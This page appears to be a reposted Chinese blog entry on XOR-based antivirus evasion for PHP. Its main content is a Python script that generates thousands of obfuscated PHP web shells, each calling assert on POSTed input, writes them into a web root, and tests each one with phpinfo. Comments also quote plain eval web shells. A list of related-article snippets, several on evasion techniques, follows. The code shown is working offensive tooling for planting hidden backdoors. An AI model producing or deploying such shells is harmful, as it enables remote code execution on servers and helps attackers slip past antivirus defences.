2. 程式人生 > 其它 >php異或免殺

php異或免殺

阿新 發佈:2021-08-13 
import requests,base64,time,sys,threading,queue
#異或免殺
#<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?>
#<?php @eval($_POST['hacker']);?>
#!和@ 先各種轉為ascll碼,再各自轉化為二進位制,兩者二進位制異或結果,轉化為ascll,最後轉化為字元

#string 檢測phpinfo是否執行成功
def string():
    while not q.empty():  # 判斷q不為空
        filename=q.get()
        url 
 
= 'http://127.0.0.1:8080/x/' + filename
        datas = {
            'x': 'phpinfo();'
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        if 'bingtang-PC' in result:
                print('check->'+filename+'->ok')
            else:
                print('check->
 
'+filename+'->no')
            time.sleep(1)

def shell_test_check():
    url='http://127.0.0.1:8080/x/33xd64.php'
    datas = {
        'x': 'phpinfo();'
    }
    result = requests.post(url, data=datas).content.decode('utf-8')
    print(result)
    if 'bingtang-PC' in result:
            print('ok')

if
 
 __name__=="__main__":
    q = queue.Queue()  # python queue模組的FIFO佇列先進先出。
    for i in range(1,127):  #ASCLL從1到127
        for ii in range(1,127):
            payload = "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            with open('D:/phpstudy/WWW/x/' + filename, 'a') as f:
                f.write(code)
                f.close()
                print(filename + '檔案生成成功')
    #多執行緒
    for x in range(10):
        t=threading.Thread(target=string)
        t.start()

相關推薦

python開發(3)-PHP

關於eval函式在php給出的官方說明是 eval 是一個語言構造器而不是一個函式,不能被 可變函式 呼叫可變函式:通過一個變數,獲取其對應的變數值,然後通過給該值增加一個括號(),讓系統認為該值是一個函式,從而當做

php

import requests,base64,time,sys,threading,queue # #<?php $a=(\"!\"^\"@\").\'ssert\';$a($_POST[\'hacker\']);?>

78:Python開發-多執行緒Fuzz&Waf&爆破

本課知識點: 協議模組使用,Request爬蟲技術,簡易多執行緒技術,編碼技術,Bypass後門技術

PHP木馬的一些總結

前言 這篇文章寫一些php木馬的一些技巧,希望對大家有點幫助。這裡解釋一下什麼是php木馬,這裡大體分為三種:

PHP 16進位制效驗

公司需要煩惱呀,下面演示 8686808905171750601011 效驗,判斷最終程式是否效驗正確地址:http://www.metools.info/code/c48.html

使用Python進行防病毒解析

很多滲透工具都提供了許可權維持的能力,如Metasploit、Empire和Cobalt Strike,但是都會被防病毒軟體檢測到這種惡意行為。在探討一個許可權維持技巧的時候,似乎越來越多的人關注的是,這個方式會不會被被軟殺掉?

基於python的BP神經網路及實現過程解析

BP神經網路是最簡單的神經網路模型了,三層能夠模擬非線性函式效果。 難點:

E語言之易語言程式永久去除_EL_HideOwner

大家可以用PCHunter檢視下,任何程式,包括無視窗的程式,易語言都會建立個隱藏的視窗,類名為_EL_HideOwner

AcWing144 最長值路徑 (Trie)

簡單的貪心Trie思路,只要發現和路徑就是兩個到根節點的路徑的值就行,之後Trie樹貪心

AcWing 143. 最大

AcWing 143.最大對 題目描述 在給定的N個整數A1,A2……AN中選出兩個進行xor()運算,得到的結果最大是多少?

《演算法競賽進階指南》0x35高斯消元與線性空間 空間

題目連結:https://www.acwing.com/problem/content/212/ 給定n個數,要求這些數能夠異或的數中的第k小,通過求異線性基就可以得到這些數可以異或得到的不相同的數的維數,通過這些線性基的異或便可以得到這些數的

《演算法筆記一》複雜度、排序、二分、

目錄時間複雜度、空間複雜度、排序、異或運算時間複雜度排序操作選擇排序氣泡排序插入排序空間複雜度常數項時間複雜度演算法最優解常見時間複雜度演算法和資料結構脈絡認識對數器認識二分法認識異或運算

CodeForces 665E. Beautiful Subarrays(字典樹)(貪心)(字首和)

題意:給定一個長度為n(1 <= n <= 1e6)的陣列a[i](0 <= a[i] <= 1e9)和k(1 <= k <= 1e9)。求有多少個區間[l, r]是合法的。我們認為一個區間是合法的,當且僅當\\(a[l]\\oplus a[l + 1]\\oplus a[l

通過Python實現Payload分離過程詳解

缺點: 編譯成exe以後體積過大 實現: msf生成shellcode程式碼: 將payload給copy下來,去除引號。

運算(相同為0,不同為1)

轉進位制計算器 先輸入一個十進位制數,再輸入要轉換的進位制······ #include<cstdio>

Trie——解決字串搜尋、最值問題

Trie——解決字串搜尋、異或最值問題 在說到Trie之前,我們設想如下問題: 給我們1e5個由小寫字母構成的不重複的字串,每個字串長度不超過6,之後是1e5次查詢操作,每次給我們一個字串,要求我們判斷這個字串是否出現

最大對-Trie--acwing

建立樹之後對樹進行操作:將每個數與其他的進行 1匹配,次數最高不過30,然後求max即可

AcWing 143 最大對(貪心,trie)

題目連結 解題思路   如果想要兩個異或的值最多,最好就是兩個數從二進位制的高位到地位,儘可能的滿足一個是1一個是0。把每個數都轉換成31位二進位制串的形式,然後存到trie樹中。然後一個一個的列舉每一個數,在

AcWing 144 最長值路徑(貪心,trie)

題目連結 解題思路   以任意一個點為根,求出它到根的異或值,那麼兩個點之間異或值就是兩者到根的異或值的異或值(因為重複的數異或值等於0),然後就變成了求n個數中兩個數最大的異或值。

最大

題目傳送:https://www.acwing.com/problem/content/description/145/ 在給定的N個整數A1,A2……AN<?XML:NAMESPACE PREFIX = \"[default] http://www.w3.org/1998/Math/MathML\" NS = \"http://www.w3.org/1998/